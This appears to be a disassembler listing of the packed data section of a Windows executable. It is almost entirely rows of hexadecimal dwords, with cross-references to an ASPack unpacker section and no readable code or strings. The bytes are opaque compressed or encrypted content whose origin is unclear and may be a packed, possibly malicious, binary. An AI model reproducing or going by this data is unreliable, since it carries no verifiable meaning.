dd 1D40568Ah, 23D9EBA0h, 4ABBB640h, 0EE76FFDCh, 0B67E10E1h
dd 8D2E3407h, 354F4786h, 528FB10Ch, 0DC560114h, 141AFF03h
dd 0D10E87A9h, 85F88B2Eh, 55B41FFFh, 8A973F3h, 186783h
dd 11C47C7h, 73750DE1h, 6240600h, 8D0E460Dh, 4F8FB28Eh
dd 4789FBC7h, 9E258A20h, 0F7768688h, 1A67F6B7h, 8904438Bh
dd 38041F1Fh, 8A047B89h, 0DB361896h, 0AC97B367h, 0D0157505h
dd 8E760040h, 47585EECh, 0C4B6FF4Dh, 7607EB0Bh, 1B1C3658h
dd 8550A536h, 0E1803D07h, 9B3C2F34h, 636951CDh, 7194F8Bh
dd 66C60189h, 4889DEC9h, 0C260735Ah, 6E7B645Eh, 0B2ABC7C0h
dd 0B008B6C4h, 0CDDD3399h, 5AD0BD02h, 0B6579D83h, 0F21D8BB8h
dd 2B0AB84Dh, 2AC38011h, 2B5906FBh, 0D31EC01Bh, 0D0DF0BB9h
dd 8E5D8D30h, 247C83CCh, 0E10FD308h, 99012DFEh, 8B470Ch
dd 0A06B08A3h, 0B1B6C058h, 96CCC9C2h, 60170DD7h, 0BFB89A4Bh
dd 0EDB79BBh, 5E8B7FE0h, 0E3B8060h, 4B8B4475h, 0C2538BF8h
dd 0F0176D4Dh, 0C0BF0B7h, 0F981FF33h, 0F445D9E0h, 9BD2C410h
dd 4174F8EDh, 3974E40Dh, 52FB5D8Dh, 4DBB75FBh, 7751509Ah
dd 9643E50h, 4B0DBF51h, 0D2EA97E0h, 89D2322Fh, 4689187Eh
dd 768B301Ch, 8BC4C225h, 0D9F044C7h, 51CD16F0h, 4C6030FFh
dd 0EDCA7454h, 6B9F2D23h, 58F685F0h, 46C60CDBh, 0BF63DB64h
dd 6846DDFBh, 44B3B89h, 153C850Fh, 0F0DF983h, 0F41E3382h
dd 1A37DB37h, 0CC255D8h, 2210CA3Bh, 16F87D81h, 9F7FC1EAh
dd 46C70975h, 6673C618h, 0D85C23F6h, 8D1A8BE3h, 1C4E719Fh
dd 50C488Dh, 0F6DBE106h, 0D7408B20h, 892455CBh, 874AEC5Dh
dd 46BFB16Fh, 878D928Fh, 6F42BE4h, 0C6783189h, 7089C2C8h
dd 13CB9756h, 42005D8Bh, 430F585Bh, 0BAC6481Dh, 0CD20CD2Ch
dd 7746B746h, 0D52B6857h, 0F7B910F9h, 6185C1DBh, 3135170Bh
dd 0AC0C1DF4h, 8A0D0B2Ah, 3BE4B574h, 0B5A1286Eh, 4189DB80h
dd 49F0459Ch, 61704444h, 0E689E086h, 76704EA6h, 6F1B272h
dd 569BEC97h, 88609F2Ch, 0CB73C5F5h, 0EE437389h, 0C68762CDh
dd 26572278h, 8BE0861h, 0C5DF169Fh, 0BDDB6205h, 1CBB1424h
dd 0DE778BC8h, 9399CC3Eh, 0CF17DCDh, 10020C39h, 0B3E1D3B8h
dd 5751CEBh, 0A3030BE8h, 0E04AEB30h, 0D866CF6Ch, 0D12DD56h
dd 56CCC941h, 0AF492043h, 25163C6Bh, 5D410052h, 490D5203h
dd 732F9Ah, 57005F1Bh, 24C15B4Eh, 0D1102405h, 1BA2DC08h
dd 8D7A5070h, 538A305Eh, 0BBA14566h, 0AFC45h, 0F33BFA05h
dd 0B90BB5D9h, 121C0972h, 0EF20CF0h, 64F3E6CDh, 18E87EF4h
dd 8EEC1AEAh, 8B5EC6FFh, 0C084D7F8h, 45AB2175h, 0F82140Ch
dd 7E85927h, 23350332h, 363B236Ch, 418A564Ch, 3F6EA48h
dd 11BB5B91h, 3F0B02C2h, 0E4880C06h, 10E7C8F3h, 0D8140E1Ah
dd 1C0BC018h, 0F9F9F9E4h, 103E2079h, 28137C24h, 9A2C0CC8h
dd 85AE1C0Dh, 2847663h, 85CC3A5Dh, 0DDFD0A66h, 0D62C144Ah
dd 641BADEEh, 20038B1Eh, 0E68A17Ch, 0FE420789h, 4D8F9F4h
dd 89047808h, 0C606EB3Dh, 1B03E42h, 9142A75Bh, 0C77F2Eh
dd 5D8E832Fh, 18069C6Bh, 2259344Bh, 6BDED942h, 31C2C0Bh
dd 389F1863h, 0EB3A9BB4h, 0B58FDE02h, 0F709BE56h, 0DF58878Ch
dd 5CA24CCEh, 9BDBB60Ch, 4EB89331h, 7D834B58h, 0FF21610Ch
dd 83D2C190h, 9D753E78h, 1EEBCE2Eh, 7E1840C7h, 3A7B115h
dd 35201556h, 78E0D22Fh, 40592A5Eh, 78100218h, 527EF7CCh
dd 8A1850ABh, 0A06D6015h, 22F62EB2h, 5672854Ah, 0C68C5873h
dd 0A274EB53h, 0ECEB36B2h, 0DD1CC631h, 5E75DE56h, 0C86C0628h
dd 0CAA37DEh, 72582834h, 0E223C36Bh, 4E57F85Dh, 0B51183E0h
dd 728F68C0h, 2E79D2FCh, 0B7E9FBC5h, 7B548FE4h, 0B86005EBh
dd 64568D72h, 7F740C55h, 7F89BFDBh, 80F0EB36h, 3700647Eh
dd 8B53684Eh, 418B6051h, 52305A6Ah, 810CE91Bh, 708AFFBh
dd 0C0A90DAEh, 0D8CFA285h, 0B22C0375h, 66A5F4ADh, 18B81058h
dd 0B08428Bh, 3495C807h, 0A95B7348h, 0EC1830FCh, 1029EB1Eh
dd 7DCDD08Ah, 0AB5C0461h, 0BBD402E0h, 9774CFEh, 2CF8190Fh
dd 0E3533F5Fh, 480F2C41h, 0DB85D8FCh, 0DFFFFCAEh, 2955F1D5h
dd 8FA8110h, 75400100h, 0E718D47h, 0A5247B8Dh, 288BA566h
dd 15AD5B10h, 765C3007h, 0DE90542Bh, 638369F3h, 0DB3019C4h
dd 0CEB1DAEh, 0F612201Ah, 0DD6EDC1h, 66040966h, 20A11407h
dd 95DD0B29h, 36EBED9Eh, 0D618094Eh, 0AB66AB4Dh, 0F3352BDBh
dd 0F63E2A07h, 0D80B1F42h, 143056CEh, 93ED0C27h, 947CDB1Ah
dd 51140A11h, 0DC38BC52h, 0E0DBC3DDh, 10AF930Ch, 14708D3Dh
dd 8070296h, 67D9D333h, 87DE8D59h, 8B212A1Ch, 0B2055590h
dd 57B216Fh, 5850D771h, 0DB2022EBh, 0F06D03Fh, 528B921Bh
dd 0F1218330h, 7E164C50h, 37694CB8h, 4513C50h, 2325833Ch
dd 9980F852h, 23183A00h, 0ECACAF4Fh, 0F18BD33Ch, 9F1DCF0Bh
dd 3BB90510h, 0F09688F9h, 3B60A5FCh, 80C73294h, 0C4788D52h
dd 5F0E7D3Bh, 407CA2h, 478B4097h, 0E869FC3Ch, 8708499h
dd 0A8576CD3h, 0E7035A1Dh, 8FE31CFEh, 0D77241D8h, 0D72A528Ah
dd 8C3118EBh, 0F246170h, 770C3D20h, 2F09DF24h, 3FF4BE0Ch
dd 0E33748A7h, 4AF4BEEFh, 0F77D89CFh, 5B3ADCB8h, 0F8B6B6FBh
dd 0E7B40118h, 0E141F6FCh, 0FBBB9AD7h, 0F3A6B674h, 1BEDB376h
dd 9A3A1948h, 0E2447F83h, 3661D051h, 0D3C11663h, 0B2311644h
dd 0E552D195h, 28F60D8Bh, 0D3E3A2BAh, 76A71E56h, 2254AA60h
dd 61A374E0h, 0A9F97FFFh, 8B3A6253h, 118BC14Dh, 674D285h
dd 108BC28Bh, 0E083F6EBh, 7BAE16C6h, 0A853B4F4h, 2F8EEB0Ah
dd 4B2D58EEh, 20830CA6h, 7682801Ah, 0CF132974h, 845114A0h
dd 0C39005EAh, 4D425638h, 0EF143F96h, 0BF76BEFh, 0D08699FFh
dd 460A06BAh, 637C5060h, 8CBB07BCh, 0BAA83986h, 34F4B3D3h
dd 670C10E3h, 3CA22464h, 2321A792h, 313F077h, 0DC5BF86Ch
dd 0D6A5C7Bh, 755A03FFh, 4BA58B19h, 0A17C112Ch, 7744A750h
dd 0E519722Dh, 67B6FB5Bh, 2A4B0306h, 18591CEBh, 488B0A73h
dd 0F82376CFh, 731477CEh, 13EB4F05h, 2D08401Dh, 66B41AD0h
dd 0A9EB232Ch, 0D5EADC1Bh, 148B2C0Bh, 0F67B3602h, 0BA6739C1h
dd 108FC16Bh, 13DC1084h, 36DCD85Fh, 18A508B3h, 27F7620h
dd 2DF8207Dh, 14045F2Dh, 34F46583h, 76FFFE62h, 40DBBF0Dh
dd 184D6889h, 0C33DD950h
dd 731C7D39h, 1BE86097h, 452BC7EBh, 4BA2B11Ch, 21FD3AB0h
dd 73FF4043h, 67DF7C38h, 46EC9EC5h, 40538A24h, 80F89927h
dd 800A0D7Fh, 2BBA528Bh, 0B2C9F475h, 4C4F7815h, 0EC343BC2h
dd 36360580h, 66342640h, 7565D81Dh, 5EB35E24h, 41BA68EBh
dd 6846A16Bh, 0C137C985h, 51D855C0h, 79834FEEh, 0E1A949F1h
dd 25746152h, 89540849h, 0CB6359B2h, 14E2E7C5h, 0DA850B78h
dd 8014F80Fh, 781A1C60h, 2155364Ch, 2E0A5F6h, 0E182A5F3h
dd 1DA4F303h, 0F600D270h, 7C8D0442h, 73D1A10h, 34FC07DBh
dd 608318B3h, 8CE4D48h, 631B6944h, 83882517h, 8B1055CFh
dd 1FBBB925h, 73838DF0h, 89113C4Ah, 0D4054042h, 691B133Eh
dd 0C1A00B3Ch, 30872D08h, 2E93AFB6h, 77F424CEh, 9A23AEF4h
dd 83C1C099h, 4C08448Dh, 4306085Eh, 7526291Fh, 20D83670h
dd 0EFE8F2D9h, 3874ECE8h, 48E96C3Eh, 0A27E5148h, 6EE6DF1Ch
dd 535C73F4h, 44342E54h, 88DB482Ch, 8E44A955h, 2770BF20h
dd 0F73B156Dh, 710CD0B3h, 743A3C39h, 0CC375BA4h, 4160DFA6h
dd 0C34049D3h, 0D83A46B2h, 2358BC4h, 0C8AAD6h, 0D79EC342h
dd 8CD308BAh, 29D63406h, 3F4A376Bh, 0F09C2C64h, 0B805EB30h
dd 23201C16h, 1CE12CD0h
dword_444804 dd 716C8409h dword_444808 dd 15348308h ; .aspack:0044A502�r
dword_44480C dd 23889404h dd 269C0CCFh, 2CF6CA57h
db 34h
dword_444819 dd 31570902h db 0Ch, 3Fh, 53h
dd 0E95AC1C1h
db 75h, 1Bh
dword_444826 dd 35DB14EBh dw 0C0ECh
dd 0BEACD98Bh, 0DA2B2075h, 1393A572h, 0A4D88357h, 0DA12F8FBh
dd 522C1054h, 61022B74h, 0CDB4D9F1h, 3C75B02Dh, 0B6596CB2h
dd 2303C6Dh, 0ED24282Ch, 8587B06Eh, 0E62C1074h, 0DC622D2Ch
dd 511A05AAh, 823AD083h, 0FD099D6Fh, 0FAC28BFh, 28024FB7h
dd 0FA469AF5h, 0E3DD728h, 0C64B6361h, 21BBF65Bh, 0A028399Dh
dd 15B7095Ah, 8134080Eh, 0D6E66311h, 21F1DE5h, 0B5CA830Ah
dd 0B58B9EEBh, 5960168Ah, 88E62015h, 11CCC43h, 6D803BE0h
dd 7189C06Fh, 459890Bh, 1378C918h, 0CA4F61D8h, 1B22C857h
dd 8B154870h, 5C137207h, 9436D8C4h, 2F03B04Bh, 1BDB6CB2h
dd 1842A72Dh, 5A20056Ah, 0EDADC47Eh, 8B34883Bh, 0C23B8104h
dd 23B35C7Eh, 0EE578DF4h, 0B740368h, 81E9BE53h, 3C1BE756h
dd 1539E440h, 3E88FFDh, 8B250F85h
dword_444914 dd 6A8E2237h dword_444918 dd 6177A13Dh dword_44491C dd 59A258h, 0B38B01A0h, 0DDECA8D4h, 58BEF8Dh, 0FEBDC89h
; DATA XREF: .aspack:0044A523�r
dd 6A604324h, 7ED0211Ch, 0BEDAB01Bh, 0BF313990h, 6A3766CEh
dd 16758A15h, 3BB9EC63h, 231DF033h, 7136EC6Eh, 354D738Bh
dd 77096418h, 0DE7B574Dh, 58B65968h, 544C3005h, 1B1830B4h
dd 0D6CB2E46h, 5C480C18h, 1950AE54h, 345979ECh, 541A125Ch
dd 0AFFE1DB7h, 90E80DBBh, 4059D8Ch, 0C7445389h, 0A31C4800h
dd 291A7D2Bh, 0BEC63B01h, 44DB0293h, 0C77018EAh, 53067B43h
dd 10B7631Eh, 0A48EBA22h, 96F5C03Eh, 4CC6063Bh, 840C3421h
dd 0B9A0E512h, 5D146130h, 0BB354884h, 3526D721h, 29E80E2Ah
dd 0F758C907h, 78A6B259h, 916B570Ah, 0B58A8468h, 0F7B1875h
dd 29DE006Eh, 1A6FD40Ah, 7A8D1B6Ah, 9F075910h, 1858E02Ch
dd 0BFF3E14Dh, 2E1D7C06h, 105109C9h, 0A050984Eh, 991A3700h
dd 323243B7h, 46326B86h, 4DCE0CFCh, 398CA64Dh, 665BA360h
dd 0B6320AB4h, 0AD70D6Dh, 4A31AA64h, 77597A08h, 0D1DED8FBh
dd 0E0CA664Ah, 324B14AAh, 42C08571h, 0C681181h, 5FA8939Ch
dd 605C47ABh, 14B98F0Ch, 0D3CB428Eh, 530084F2h, 843B1931h
dd 5CBB800Eh, 0EC278A60h, 90A46ECCh, 8D8066E2h, 670A4E5Ch
dd 0C46E4145h, 0FA008897h, 25300C88h, 38EC8191h, 2BC41D10h
dd 125725CCh, 0CD6807BFh, 3304B9AEh, 0E6C3BAFFh, 0D89680D9h
dd 0FC04DCDAh, 3B3E6C9Eh, 0CA0CC812h, 0D010CC0Eh, 0D9910B18h
dd 0D41AD27Ch, 9466F820h, 36DD028h, 2CE213E0h, 0D5D40FD2h
dd 0A2531740h, 0A0083056h, 0C228656Dh, 995D8D57h, 0A7365B61h
dd 0C80A1ED6h, 0B7580C81h, 0D011CB21h, 500C83Bh, 0F6C8B7Dh
dd 11D83B18h, 788C3DB6h, 3FEE2284h, 0ECBA1F6Fh, 2004B809h
dd 7F0C8DF8h, 0B419E7C1h, 48EEC42Dh, 44D521C4h, 77F4DC07h
dd 56EFACE8h, 53BF773Ah, 8D458189h, 0D106DC60h, 0F6E0B541h
dd 96DE8C00h, 4D5B17A0h, 7D318BE0h, 4581C128h, 0AFAC99A0h
dd 0F4BBB9A2h, 0BAB60DFFh, 8DC2FF50h, 32B87373h, 6A9A2E89h
dd 7A8DDF00h, 0B6E5B5F8h, 0DF86675h, 3040883h, 96FB02ECh
dd 6F4D68Eh, 114279Dh, 0F0B41BE9h, 0B2176E6Dh, 5E377B85h
dd 460014F0h, 0FF1E19B9h, 0FEEE150Ch, 0A093A00Ch, 3889CABBh
dd 0C651E35Fh, 7BD41C31h, 6C6AE279h, 73718B8Ch, 0FE00F4Dh
dd 2CD3591Bh, 63A239A3h, 0FBC321C3h, 130C1A1Eh, 282B5AD1h
dd 8C140D71h, 26734182h, 0BA438364h, 0E017750Eh, 8308A80Eh
dd 9C383597h, 904C0D5Bh, 9BD2F893h, 8128481Ah, 0C401147Bh
dd 0B80775FCh, 0A6D834ACh, 4637EB2Ah, 0A445B957h, 93C5278h
dd 5304C053h, 735A01BDh, 682F8740h, 68F14CD9h, 9BBDFDC4h
dd 3B1D6A5Fh, 0BE4C8BBFh, 8193A354h, 7F061479h, 1AE00A1h
dd 81208D6Dh, 7605DC38h, 6854D005h, 6001B1Bh, 3C725E2Ch
dd 2FA39DDDh, 29665D14h, 19112830h, 9C9B584Ah, 582106EAh
dd 640611BAh, 0E8187151h, 49700E0Eh, 2117F67h, 589B7F08h
dd 57EE085h, 284A7427h, 0B952211Dh, 7A8D4D10h, 687D49C8h
dd 468C0C76h, 39578414h, 2BAB7EA4h, 46895F18h, 7C1E8B10h
dd 150FC0E0h, 0FAC38156h, 0B95E551Dh, 721FF87h, 60C38356h
dd 9AB8ECEBh, 1995ED51h, 73D64B18h, 7E748253h, 57DACCD5h
dd 0A577E434h, 0E830B89h, 0AA437632h, 7F478D47h, 9036FF47h
dd 80CC0BECh, 891840F1h, 87838147h, 579E9707h, 60579E7Ch
dd 0AC5A2DBDh, 0B43E8750h, 98057D68h, 6B3CA390h, 81E0663Ch
dd 0C683F06Eh, 7579FF04h, 450C4993h, 2D3218BEh, 1EF65810h
dd 712CD890h, 4650BE9Ch, 0D0480D8Bh, 0DFFBFEEh, 0D08A147Dh
dd 0C83B09B8h, 7541588h, 0FF065574h, 0EF3E1A2Dh, 98BC459h
dd 0F375DF3Bh, 944D1314h, 5379D61Bh, 9E976F9Bh, 56F98C35h
dd 1E47754Ch, 103844F0h, 0E1584B54h, 57184503h, 0C3C4DE1Ah
dd 0FDD7CA06h, 25340125h, 9710F750h, 18161CEBh, 0D58C102Eh
dd 44928733h, 0B618D126h, 1483553Ah, 42F84008h, 0A92F05A1h
dd 0D0EAB1CAh, 9CAB70BFh, 507C7589h, 0E4E8DF2h, 58EE5589h
dd 0E6ED1B75h, 0A5A3D35h, 829505B8h, 0BA8083B0h, 9C518C49h
dd 1C107B9h, 860F5581h, 0A09B0597h, 4E8F0483h, 2A748EEAh
dd 607EC0E5h, 7480350Fh, 0CA061F1Ah, 0AA3162Ah, 2A895327h
dd 2654F7C0h, 0E177C928h, 9E4A7461h, 1274F446h, 58A9649Dh
dd 5847388Ch, 64B7E0F4h, 4F30F400h, 5598430Ch, 0D0278DCAh
dd 0BA1F7827h, 0BCA23DD7h, 3104CA1h, 0A9422A7Ah, 81E045C7h
dd 0DD08A840h, 8A5414B0h, 0DF8E76E5h, 0A33772D6h, 0B9D3FF2Dh
dd 2E0E6A1Fh, 8F3447B4h, 41D60A23h, 0A256C51Eh, 315921ADh
dd 57361087h, 1C6EB780h, 150F04BDh, 0D7374450h, 9517F3Ah
dd 0D0B0FA0Ch, 8A99A266h, 0D54C5304h, 9037BE87h, 0A46FC25Ah
dd 0C7B2FFD3h, 3AC10D10h, 521FEB34h, 0C1D95152h, 387D6A78h
dd 3056D951h
db 8, 0C9h, 0Eh
byte_444E5F db 3 ; DATA XREF: .data:off_446A89�o
dd 345653BFh, 2251FA5h, 8CB000E0h, 0D41C27E7h, 80E53AA1h
dd 3C2D6DBFh, 0F0B31EAh, 0F3DC6887h, 71880C60h, 5F04D947h
dd 985A1039h, 8AE1A4Dh, 8123FCD0h, 590C86D7h, 26F011FCh
dd 420C9C87h, 0FCFCF8E4h, 2D812B3Bh, 0D28F5D3Ah, 0C61EE155h
dd 2C4B0C00h, 0C80CC9D8h, 8080C81h, 0E59193DDh, 80F1463h
dd 88E408F8h, 8BF8F253h, 0B38DF84Eh, 0E21D6803h, 855DB93h
dd 9BA68388h, 0F9A5E59h, 842D42Ah, 9E084A89h, 11AF1C01h
dd 2B651471h, 926F19B8h, 0C7F45E9h, 0D620D5C7h, 454CC803h
dd 10F2D2C2h, 38BAF3E0h, 1E770C7Eh, 9F210394h, 0CB113108h
dd 17212162h, 2156D48Ah, 39097EBEh, 0C9347C50h, 73C2D8F3h
dd 7F04DA2Dh, 1EBEC017h, 0E1449C48h, 0D90D74CEh, 897B7091h
dd 74C2E36Fh, 3B67B893h, 8740C20h, 77360F35h, 0EB8FECABh
dd 0A9658D8h, 0B299219Fh, 41431F07h, 810E4112h, 0FE0F5C25h
dd 81F46D93h, 43037759h, 97D75860h, 0C33490C1h, 0AF4476CCh
dd 3B21D9B0h, 0EC98AF6Dh, 9A401AA3h, 75095C00h, 84683DECh
dd 0B75D4E15h, 161C90EDh, 3B0A264Ah, 9A69362Eh, 0F29B08B1h
dd 6DF30CDEh, 2901C90Ch, 0A7581B0Dh, 0DB933491h, 473DDBEFh
dd 0E944C298h, 308DF586h, 69CF0E44h, 992A2D16h, 5314E30Ch
dd 0B8DDC075h, 60140773h, 75727E80h, 2ED21A4Eh, 398756E8h
dd 7495D233h, 0CA0C7930h, 0C048C4B1h, 6F4DB94Dh, 167AB7F7h
dd 58EC588Bh, 0FFE38110h, 0B8C4C0Fh, 6F750806h, 7E0C9B1Bh
dd 4A47D103h, 0F56B1ED2h, 147EE82Dh, 0C61689B9h, 0B85A9246h
dd 53B78FDh, 3EB1454h, 4948C8DEh, 235C1976h, 1925A75h
dd 2A3A1058h, 366FB76Bh, 754FFC8Ch, 796683EAh, 19866680h
dd 1B5024B6h, 3C17C252h, 17C4B618h, 3956BA02h, 1871105Dh
dd 7D9F2BCBh, 83E34C1h, 718B08CEh, 759CDF45h, 0D375615Dh
dd 5814D214h, 751C5938h, 6DBB5B50h, 5D1D41C1h, 804CEF8h
dd 6A976FDFh, 1450F3CEh, 0F8550148h, 5AD2D33Bh, 0C84E476Bh
dd 139418EBh, 0D4230CEAh, 0B6EFA5A6h, 0EBB3FFFAh, 2139D3CAh
dd 0FDFA8F14h, 4056F61h, 16D641C6h, 50646F6h, 5BEB0CDCh
dd 4A878AE7h, 56E48EF8h, 0E6E5C060h, 14A86C5Ah, 89AAADE1h
dd 0DDB2AF00h, 8B2D6B77h, 0A5F33B36h, 0EB3C7C74h, 4B77EDCFh
dd 3D743E75h, 77147255h, 29C28B02h, 0BB76E06h, 13D02BDFh
dd 0A4EB9704h, 1BA0744Dh, 172B7610h, 4EFD686h, 3DD2F3DBh
dd 368DB6Bh, 0CD4D9ADh, 1229CB27h, 18AB9AB4h, 202CC22Ah
dd 86DABB48h, 37110115h, 0B54B4E86h, 0CAAAC243h, 46658714h
dd 0BDAB1F6Fh, 59066A57h, 56FE8B14h, 10E340B8h, 0D2991B4h
dd 0CD6ACC2Dh, 6DC4A3EEh, 156614A0h, 12B302B6h, 241E088h
dd 50D75062h, 29C533Ch, 6FCC0CEEh, 7E8D1EFEh, 1FD06608h
dd 465459C0h, 568AE8EBh, 7ADB8069h, 0E52ECE0Fh, 0E7BD3114h
dd 61DD6CCh, 6820F454h, 642DD81Eh, 619DB0CFh, 6500101Dh
dd 4036A91Ah, 0BDEE5A55h, 462D54B4h, 0FE34FD6Fh, 8CA02CB7h
dd 0F39FF98Ch, 54D6ED6Fh, 0F9D19AB8h, 0DA75273Fh, 78EC03Eh
dd 513C5F82h, 0D4B85393h, 37170E42h, 0BC575BABh, 721B6ABAh
dd 87B249BEh, 3F736DFh, 0F9190B68h, 20B1FC0h, 46473C8Ch
dd 0C800D2C4h, 0FC18888Eh, 0CB85CC8Ch, 0C68DED02h, 36B3F803h
dd 1A24C19Ch, 61B456Ch, 1781BD63h, 27D19A3Fh, 7E4D7701h
dd 908B4298h, 0BD40B06Fh, 830C33FBh, 0E9F714C1h, 0A8F1B6CDh
dd 0F458853h, 3314756Eh, 7DB38447h, 4D8A7447h, 32A4170Fh
dd 7031F620h, 0B1AE6225h, 6BED052h, 646D80B8h, 0A38109B3h
dd 0B2701F29h, 7982FB1Dh, 0CE49E80Ch, 94BE43D1h, 5B535241h
dd 55746A70h, 0B1B9E0A4h, 9E147E08h, 6D5BBAF8h, 0C4201CD0h
dd 23F61122h, 2B762060h, 0D8C7E0E8h, 80180305h, 1E89EF17h
dd 0F02F6CE5h, 8E9076C0h, 0B771FB3Bh, 247B7D1h, 8F7BE39Ah
dd 9F8B2B54h, 97CCFD5Ah, 887880Ch, 0D83B0B02h, 351EF012h
dd 19EA2223h, 64D42846h, 1AF54BECh, 424C22F3h, 531F8021h
dd 735B3320h, 96830111h, 819C0885h, 1C068158h, 16D1D043h
dd 4D99B362h, 0D4BD1E4Bh, 46464646h, 0DC94D8FCh, 46F6161Fh
dd 0A5CBB30Dh, 0EFBD8D69h, 0C78BBF61h, 8BC54D89h, 5BBBF18h
dd 0A25781A3h, 0EC65CC7Eh, 9411A508h, 37893DCAh, 9D6F263Eh
dd 1A496C1Bh, 0B602EC0Fh, 0AB6831FFh, 61135B3h, 0FFF04150h
dd 0FB6C5EF7h, 0A2278303h, 0A559F093h, 88403FBFh, 53ABB739h
dd 0FFFFFE1Ah, 21B30833h, 249F4A8Ah, 43850A90h, 0C64657E9h
dd 0B054212Dh, 171F99EBh, 970E016Dh, 6D3F88B2h, 1E3A3175h
dd 898A4805h, 516CC689h, 8BF54848h, 7992FFEDh, 0BF0246E2h
dd 30306B38h, 0EE6BD78Ah, 5063435h, 768A810Ch, 0CF0AD939h
dd 3F3BB3Ch, 0E11C231Ch, 0FE565ADEh, 0A3AC6A05h, 933B7593h
dd 1B3140A1h, 0B451329h, 14A30820h, 0FBAD46CEh, 234BC38Bh
dd 3CA692C1h, 0A1367014h, 0FBC3946Ch, 42B66C2Eh, 0A1728AE7h
dd 0DA043D8Ah, 0F6C4CD86h, 8B8AD04Bh, 6054F2h, 655CE133h
dd 806FC34Ah, 90494C35h, 0D9884D38h, 0C7DE27B0h, 30234E06h
dd 660F73Fh, 0F5528101h, 18363C05h, 45C72011h, 3240C362h
dd 0F48880C0h, 0EBA21A4Ch, 8C47C7B0h, 83659159h, 1C4D6C12h
dd 2F6D872h, 3C740F0Ah, 0DAB3C212h, 0E106B57h, 0E03CCD96h
dd 74F8083h, 1E0E85D8h, 7B830B4Dh, 8540B94h, 8F547C0Fh
dd 0E7931EE8h, 1BBBBE2Dh, 35750252h, 19741005h, 831247F6h
dd 9E00BD0Bh, 5C6A1075h, 0C530087Bh, 66BBB86Ah, 758FA7F3h
dd 539A570Ah, 163145Ah, 570228C0h, 0B2585232h, 0D0D12961h
dd 39D37B2Ch, 7401D0C6h, 0CC868B71h, 4BEC6419h, 8D534F27h
dd 86CBCD9Eh, 19192190h, 0EF86868Eh, 960E464Eh, 1545BCBh
dd 0B1571375h, 56AC5D25h, 0AB04ACB6h, 5428E6E7h, 0CC057B01h
dd 91919102h, 0DCC4C891h, 919191BCh, 0C0B4B891h, 919981D0h
dd 0E0D8D491h, 0C9452800h, 0E200FFC8h, 9EE886EDh, 0BAE904h
dd 235686F0h, 2170BFC2h, 0BA01FB36h, 8B0E5A4Dh, 0C6033C70h
dd 1C8DB454h, 100641BCh, 0C2D16F00h, 0EB386ED7h, 1635EE0h
dd 0BADD221Ah, 901426FCh, 0F17C0B17h, 7D7A4A76h, 0E87F071Dh
dd 37FFADEh, 8A188AC2h, 751E3ACBh, 30C9841Ah, 0C01588Ah
dd 15BB715Eh, 46905D50h, 0E2751146h, 7605A3FFh, 401B05CFh
dd 831B4FD8h, 83022045h, 8B42A681h, 96723CC7h, 57C5FC3Bh
dd 0BC727AB3h, 20EE4A33h, 8FF06A2Dh, 0B70F0CADh, 8DF22B00h
dd 82D4455Dh, 630B5B8h, 0AA4EDF81h, 53FA2BDAh, 6164410Ch
dd 0C8003170h, 13F452B5h, 0D60F0403h, 3BA5FB0Eh, 6F636F74h
dd 1244176Ch, 0F4533019h, 42671752h, 0C16778F1h, 94D55677h
dd 0EBC4B4Dh, 2BBEC648h, 0CA94091h, 2A02811Dh, 87F4E456h
dd 0B0BED557h, 16387870h, 0ECF20320h, 2D0B157Ah, 8B244E75h
dd 0FA74032Ch, 0DFA3A05Dh, 0FEC5DB0h, 3F53C320h, 220F4FFFh
dd 6B621601h, 20510F48h, 4BD45076h, 9E9E56C1h, 2D346883h
dd 3EA96A38h, 311A57DAh, 0F3481CA3h, 205D12B0h, 20481694h
dd 141C85CFh, 7C8760C2h, 0EC187217h, 47A37862h, 3E50CEB3h
dd 88895B92h, 5E2B66B5h, 1227105h, 0DE210E23h, 745FFB67h
dd 0E91807F1h, 63BB2FA1h, 95C76F14h, 3D24053Fh, 5BF7505Ch
dd 454400D1h, 690076h, 895C0763h, 876DDDC2h, 730B64h, 0D7AE0772h
dd 611B9B75h
dd 1D6D030Bh, 1B720374h, 203C5D63h, 3B558CDFh, 8DC11763h
dd 6E651F74h, 7D179B21h, 49506DCFh, 752EDh, 0B6426F63h
dd 6937CC0Dh, 0B3275C0Dh, 0A9119440h, 3218866Ch, 0F0D0BDB4h
dd 2EA8685Ch, 0E25E5009h, 0DA186809h, 2153B281h, 5606D4F7h
dd 1C4B5012h, 865A2826h, 8308E25Ah, 0F6ADDA95h, 70D85B7h
dd 22C4AA58h, 5153944Dh, 6F3BFC68h, 9476D6EEh, 9C889820h
dd 0B0060DC8h, 0E46206FEh, 14B43EE6h, 0E0B8142Fh, 0DB2DB6C0h
dd 0CC288FF6h, 57D4D002h, 880C7E20h, 68E83EE6h, 79402F0Ch
dd 0C41B2F73h, 1E241816h, 6A38568Bh, 0E21501DEh, 46FA8B1Bh
dd 1AB859A1h, 6F0DE007h, 0B8F716D1h, 5E920920h, 70028934h
dd 0F25E8BF5h, 4B868940h, 63547846h, 0FA22C115h, 0CEFFB894h
dd 687447EEh, 6CA30458h, 0B8D6FF0Eh, 0F3C88648h, 4C50157Ch
dd 0F41CEA48h, 6A53C1D0h, 0ECF329CCh, 3D736F4Dh, 96595183h
dd 34402FF3h, 51F1F068h, 0AC4F076h, 0A012F098h, 53140D0Fh
dd 0D97A32D4h, 12D84A06h, 301330CCh, 1D65E533h, 30E0C303h
dd 2A345644h, 0B4C9A030h, 64FD2B02h, 1C81F50h, 53D3654Bh
dd 4C6E6970h, 51ADEA0Ch, 1211774h, 0AEFEFB49h, 7953FEDDh
dd 1C6F626Dh, 171A4C63h, 74520394h, 8975516Ch, 0DB6B36Ah
dd 61074979h, 0ED925508h, 431B3173h, 0B677A895h, 565C642Bh
dd 6DAD542Bh, 2D496450h, 0AA6B2916h, 669566FEh, 706D6F43h
dd 7164656Ch, 1B92DB3Eh, 0F7F395h, 0C6C06342h, 5A4A68A0h
dd 0F6B517FAh, 6E49F24Dh, 3C455D37h, 0FAA1257Eh, 2D75E85h
dd 6B957350h, 27B3B09Fh, 6F5422BDh, 8D1B6E41h, 0E65176Bh
dd 644DEA33h, 0B6C7BFF2h, 4D024E7Eh, 4CEC4D6Dh, 6761506Bh
dd 0A802BAD7h, 4FE07B9Ah, 661E6662h, 585E7E03h, 17D44DB3h
dd 421452B5h, 0CEDAA179h, 14541AAh, 0C355EE78h, 5417D9F6h
dd 0F9137079h, 0FF955369h, 1A05186Dh, 726B736Fh, 652E6C6Eh
dd 0D6E12E78h, 664BB536h, 7361384Bh, 73364F82h, 4113EFC9h
dd 69757163h, 77085072h, 0DEDB42EDh, 71724973h, 3E0D48ADh
